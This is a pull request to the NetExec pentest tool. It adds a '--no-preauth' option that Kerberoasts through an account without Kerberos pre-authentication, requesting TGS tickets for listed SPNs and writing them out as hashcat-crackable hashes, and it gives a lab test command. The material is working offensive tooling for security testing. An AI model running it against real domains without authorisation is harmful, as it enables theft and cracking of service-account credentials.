### PR TITLE
Add Kerberoasting support with no-preauth user

### DIFF
--- a/nxc/connection.py
+++ b/nxc/connection.py
@@ -136,7 +136,11 @@ class connection:
         # Authentication info
         self.password = ""
         self.username = ""
-        self.kerberos = bool(self.args.kerberos or self.args.use_kcache or self.args.aesKey or (hasattr(self.args, "delegate") and self.args.delegate))
+        self.kerberos = bool(self.args.kerberos or
+                             self.args.use_kcache or
+                             self.args.aesKey or
+                             (hasattr(self.args, "delegate") and self.args.delegate) or
+                             (hasattr(self.args, "no_preauth") and self.args.no_preauth))
         self.aesKey = None if not self.args.aesKey else self.args.aesKey[0]
         self.use_kcache = None if not self.args.use_kcache else self.args.use_kcache
         self.admin_privs = False

--- a/nxc/protocols/ldap.py
+++ b/nxc/protocols/ldap.py
@@ -1027,8 +1027,6 @@ class ldap(connection):
 
              return
 
-
-
         # Building the search filter
         searchFilter = "(&(servicePrincipalName=*)(!(objectCategory=computer)))"
         attributes = [
@@ -1484,5 +1482,3 @@ class ldap(connection):
                 if each_file.startswith(self.output_filename.split("/")[-1]) and each_file.endswith("json"):
                     z.write(each_file)
                     os.remove(each_file)
-
-

--- a/nxc/protocols/ldap.py
+++ b/nxc/protocols/ldap.py
@@ -409,7 +409,11 @@ class ldap(connection):
                 f"{domain}\\{self.username}{' account vulnerable to asreproast attack'} {''}",
                 color="yellow",
             )
-            return False
+            # If no preauth is set, we want to be able to execute commands such as --kerberoasting
+            if self.args.no_preauth:  # noqa: SIM103
+                return True
+            else:
+                return False
         except SessionError as e:
             error, desc = e.getErrorString()
             used_ccache = " from ccache" if useCache else f":{process_secret(kerb_pass)}"

--- a/nxc/protocols/ldap.py
+++ b/nxc/protocols/ldap.py
@@ -1004,13 +1004,15 @@ class ldap(connection):
                     skipped.append(base_name)
                     continue
 
+                if not self.username:
+                    self.logger.fail("Likely executed without password flag. Please run the command with -p ''")
+                    return
                 hashline = KerberosAttacks(self).get_tgs_no_preauth(self.username, spn)
                 if hashline:
                     hashes.append(hashline)
 
             if skipped:
                 self.logger.display(f"Skipping account: {', '.join(skipped)}")
-
             if hashes:
                 self.logger.display(f"Total of records returned {len(hashes)}")
             else:
@@ -1021,7 +1023,6 @@ class ldap(connection):
                 if self.args.kerberoasting:
                     with open(self.args.kerberoasting, "a+", encoding="utf-8") as f:
                         f.write(line + "\n")
-
             return
 
         # Building the search filter

--- a/nxc/protocols/ldap.py
+++ b/nxc/protocols/ldap.py
@@ -981,7 +981,7 @@ class ldap(connection):
                         hash_asreproast.write(f"{hash_TGT}\n")
 
     def kerberoasting(self):
-        if self.args.no_preauth_user:
+        if self.args.no_preauth:
              if not self.args.username:
                  self.logger.fail("Use -u/--username to supply a list of usernames or SPNs (file or comma-separated list)")
                  return
@@ -1005,7 +1005,7 @@ class ldap(connection):
                      continue
 
                  hashline = KerberosAttacks(self).get_tgs_no_preauth(
-                     self.args.no_preauth_user,
+                     self.args.no_preauth,
                      spn
                  )
                  if hashline:

--- a/nxc/protocols/ldap.py
+++ b/nxc/protocols/ldap.py
@@ -982,50 +982,50 @@ class ldap(connection):
 
     def kerberoasting(self):
         if self.args.no_preauth:
-             if not self.args.username:
-                 self.logger.fail("Use -u/--username to supply a list of usernames or SPNs (file or comma-separated list)")
-                 return
+            if not self.args.username:
+                self.logger.fail("Use -u/--username to supply a list of usernames or SPNs (file or comma-separated list)")
+                return
 
-             usernames = []
-             for item in self.args.username:
-                 if os.path.isfile(item):
-                     with open(item, encoding="utf-8") as f:
-                         usernames.extend(l.strip() for l in f if l.strip())
-                 else:
-                     usernames.append(item.strip())
+            usernames = []
+            for item in self.args.username:
+                if os.path.isfile(item):
+                    with open(item, encoding="utf-8") as f:
+                        usernames.extend(l.strip() for l in f if l.strip())
+                else:
+                    usernames.append(item.strip())
 
-             skipped = []
-             hashes  = []
+            skipped = []
+            hashes = []
 
-             for spn in usernames:
-                 base_name = spn.split("/", 1)[0].split("@", 1)[0].rstrip()
+            for spn in usernames:
+                base_name = spn.split("/", 1)[0].split("@", 1)[0].rstrip()
 
-                 if base_name.lower() == "krbtgt" or base_name.endswith("$"):
-                     skipped.append(base_name)
-                     continue
+                if base_name.lower() == "krbtgt" or base_name.endswith("$"):
+                    skipped.append(base_name)
+                    continue
 
-                 hashline = KerberosAttacks(self).get_tgs_no_preauth(
-                     self.args.no_preauth,
-                     spn
-                 )
-                 if hashline:
-                     hashes.append(hashline)
+                hashline = KerberosAttacks(self).get_tgs_no_preauth(
+                    self.args.no_preauth,
+                    spn
+                )
+                if hashline:
+                    hashes.append(hashline)
 
-             if skipped:
-                 self.logger.display(f"Skipping account: {', '.join(skipped)}")
+            if skipped:
+                self.logger.display(f"Skipping account: {', '.join(skipped)}")
 
-             if hashes:
-                 self.logger.display(f"Total of records returned {len(hashes)}")
-             else:
-                 self.logger.highlight("No entries found!")
+            if hashes:
+                self.logger.display(f"Total of records returned {len(hashes)}")
+            else:
+                self.logger.highlight("No entries found!")
 
-             for line in hashes:
-                 self.logger.highlight(line)
-                 if self.args.kerberoasting:
-                     with open(self.args.kerberoasting, "a+", encoding="utf-8") as f:
-                         f.write(line + "\n")
+            for line in hashes:
+                self.logger.highlight(line)
+                if self.args.kerberoasting:
+                    with open(self.args.kerberoasting, "a+", encoding="utf-8") as f:
+                        f.write(line + "\n")
 
-             return
+            return
 
         # Building the search filter
         searchFilter = "(&(servicePrincipalName=*)(!(objectCategory=computer)))"

--- a/nxc/protocols/ldap.py
+++ b/nxc/protocols/ldap.py
@@ -986,15 +986,11 @@ class ldap(connection):
 
     def kerberoasting(self):
         if self.args.no_preauth:
-            if not self.args.username:
-                self.logger.fail("Use -u/--username to supply a list of usernames or SPNs (file or comma-separated list)")
-                return
-
             usernames = []
-            for item in self.args.username:
+            for item in self.args.no_preauth:
                 if os.path.isfile(item):
                     with open(item, encoding="utf-8") as f:
-                        usernames.extend(l.strip() for l in f if l.strip())
+                        usernames.extend(line.strip() for line in f if line.strip())
                 else:
                     usernames.append(item.strip())
 
@@ -1008,10 +1004,7 @@ class ldap(connection):
                     skipped.append(base_name)
                     continue
 
-                hashline = KerberosAttacks(self).get_tgs_no_preauth(
-                    self.args.no_preauth,
-                    spn
-                )
+                hashline = KerberosAttacks(self).get_tgs_no_preauth(self.username, spn)
                 if hashline:
                     hashes.append(hashline)
 

--- a/nxc/protocols/ldap.py
+++ b/nxc/protocols/ldap.py
@@ -343,7 +343,7 @@ class ldap(connection):
         self.logger.display(f"{self.server_os} (name:{self.hostname}) (domain:{self.domain}) ({signing}) ({cbt_status}) {ntlm}")
 
     def kerberos_login(self, domain, username, password="", ntlm_hash="", aesKey="", kdcHost="", useCache=False):
-        self.username = username if not self.username else self.username    # With ccache we get the username from the ticket
+        self.username = username if not self.args.use_kcache else self.username    # With ccache we get the username from the ticket
         self.password = password
         self.domain = domain
         self.kdcHost = kdcHost

--- a/nxc/protocols/ldap/kerberos.py
+++ b/nxc/protocols/ldap/kerberos.py
@@ -105,17 +105,17 @@ class KerberosAttacks:
         return entry
 
     def output_tgs_from_asrep(self, asrep_blob, spn, fd=None):
-        asrep  = decoder.decode(asrep_blob, asn1Spec=AS_REP())[0]
-        realm  = self.domain.upper()
-        enc    = asrep['ticket']['enc-part']
-        etype  = enc['etype']
-        cipher = enc['cipher'].asOctets()
+        asrep = decoder.decode(asrep_blob, asn1Spec=AS_REP())[0]
+        realm = self.domain.upper()
+        enc = asrep["ticket"]["enc-part"]
+        etype = enc["etype"]
+        cipher = enc["cipher"].asOctets()
 
-        service = spn.split('/')[0]
+        service = spn.split("/")[0]
         spn_fmt = spn.replace(":", "~")
 
         if etype == constants.EncryptionTypes.rc4_hmac.value:  # 23
-            chk  = hexlify(cipher[:16]).decode()
+            chk = hexlify(cipher[:16]).decode()
             data = hexlify(cipher[16:]).decode()
             entry = f"$krb5tgs${etype}*{service}${realm}${spn_fmt}*${chk}${data}"
 
@@ -123,7 +123,7 @@ class KerberosAttacks:
             constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value,  # 17
             constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value,  # 18
         ):
-            chk  = hexlify(cipher[-12:]).decode()
+            chk = hexlify(cipher[-12:]).decode()
             data = hexlify(cipher[:-12]).decode()
             entry = f"$krb5tgs${etype}${service}${realm}$*{spn_fmt}*${chk}${data}"
 

--- a/nxc/protocols/ldap/proto_args.py
+++ b/nxc/protocols/ldap/proto_args.py
@@ -13,6 +13,7 @@ def proto_args(parser, parents):
     egroup = ldap_parser.add_argument_group("Retrieve hash on the remote DC", "Options to get hashes from Kerberos")
     egroup.add_argument("--asreproast", help="Output AS_REP response to crack with hashcat to file")
     egroup.add_argument("--kerberoasting", help="Output TGS ticket to crack with hashcat to file")
+    egroup.add_argument("--no-preauth", "-np",dest="no_preauth", help="No-preauth user for AS-REQ Kerberoast (use with -u users/SPNs).")
 
     vgroup = ldap_parser.add_argument_group("Retrieve useful information on the domain")
     vgroup.add_argument("--base-dn", metavar="BASE_DN", dest="base_dn", type=str, default=None, help="base DN for search queries")

--- a/nxc/protocols/ldap/proto_args.py
+++ b/nxc/protocols/ldap/proto_args.py
@@ -13,7 +13,7 @@ def proto_args(parser, parents):
     egroup = ldap_parser.add_argument_group("Retrieve hash on the remote DC", "Options to get hashes from Kerberos")
     egroup.add_argument("--asreproast", help="Output AS_REP response to crack with hashcat to file")
     egroup.add_argument("--kerberoasting", help="Output TGS ticket to crack with hashcat to file")
-    egroup.add_argument("--no-preauth", "-np",dest="no_preauth", help="No-preauth user for AS-REQ Kerberoast (use with -u users/SPNs).")
+    egroup.add_argument("--no-preauth", nargs=1, dest="no_preauth", help="No-preauth user for AS-REQ Kerberoast (use with -u users/SPNs).")
 
     vgroup = ldap_parser.add_argument_group("Retrieve useful information on the domain")
     vgroup.add_argument("--base-dn", metavar="BASE_DN", dest="base_dn", type=str, default=None, help="base DN for search queries")


### PR DESCRIPTION
<!--
Branch:  feat/kerberoast-no-preauth  
Commit:  feat(ldap): add Kerberoasting with no-preauth user
-->

## Description

This PR adds **a new LDAP capability** to NetExec:

 **Kerberoasting with a *no-preauth* user :** 

   New flag `--no-preauth / -np` lets you request TGS tickets directly with an account that has **“Do not require Kerberos pre-authentication”** (UF\_DONT\_REQUIRE\_PREAUTH).
   Machine accounts and **krbtgt** are automatically skipped and summarised.

No additional dependencies are required; everything relies on Impacket already bundled with NetExec.

---

## Type of change

* [x] New feature (non-breaking change which adds functionality)
* [ ] Bug fix
* [ ] Breaking change
* [ ] Documentation update
* [ ] Third party update

---

## Setup guide for the review

| Item        | Version / Info              |
| ----------- | --------------------------- |
| NetExec     | current `dev` + this branch |
| Python      | 3.11                        |
| Host OS     | Exegol nightly - v.9590653c                |
| Target DC   | Windows Server 2022 (20348) |
| Realm / KDC | AZOX.CORP (no TLS)          |

### How to test

 **Kerberoast via no-preauth**

   ```bash
   nxc ldap IP -u valid_users.txt --no-preauth cdarwin --kerberoasting hashes.txt
   ```

   Expected: single *Skipping account: krbtgt, AZOX\$* line, *Total of records returned 1*, TGS hash saved (see ①).

No GPO / registry tweaks necessary; you only need one user (e.g. **cdarwin**) flagged *no pre-auth*.

---

## Screenshot
---

### ① `--no-preauth` Kerberoast
![1](https://github.com/user-attachments/assets/3902c94a-0bf2-44a0-b1b9-52c88825e492)

---

## Checklist

* [ ] I have run **Ruff** (`poetry run python -m ruff check . --preview`)
* [ ] I have added/updated **tests/e2e\_commands.txt** if needed
* [ ] All e2e tests pass locally
* [ ] I linked any upstream PRs for third-party changes (if applicable)
* [ ] I performed a **self-review** of my code
* [ ] Code is commented where necessary
* [ ] I updated the documentation (PR to [https://github.com/Pennyw0rth/NetExec-Wiki](https://github.com/Pennyw0rth/NetExec-Wiki))

